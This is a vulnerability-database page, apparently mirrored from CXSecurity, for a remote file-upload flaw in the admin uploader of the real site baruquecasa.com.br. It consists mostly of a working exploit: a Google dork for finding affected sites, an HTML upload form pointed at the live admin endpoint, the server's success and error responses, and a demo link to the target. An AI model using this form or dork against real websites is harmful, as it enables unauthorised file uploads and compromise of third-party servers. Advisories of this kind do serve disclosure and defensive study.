https://cxsecurity.com/issue/WLB-2018060102
Baruque Casa Remote File Upload Vulnerability - CXSecurity.com






漏洞ID | 1209761 | 漏洞类型 | |
发布时间 | 2018-06-11 | 更新时间 | 2018-06-11 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Baruque Casa Remote File Upload Vulnerability
# Google Dork: intext:Copyright Baruque Casa.
# Exploit Author: Mr.T959
# Author Website : http://mr-t959.xyz
# Tested on: Windows 7
--------------------------------------
# Exploit HTML Code :
<form method='post' target='_blank' action='http://www.baruquecasa.com.br/admin/server/php/' enctype='multipart/form-data'>
<input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form>
# Exploit
admin/server/php/
# Successful
{"files[{"name":"b6fa0f07f57514815d1b310a6b97d70e.jpeg","size":5362,"type":"image\/jpeg","url":"http:\/\/www.baruquecasa.com.br\/admin\/server\/php\/fotos\/b6fa0f07f57514815d1b310a6b97d70e.jpeg"
# Error
{"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]}
# Demo
http://www.baruquecasa.com.br/admin/server/php/
检索漏洞
开始时间
结束时间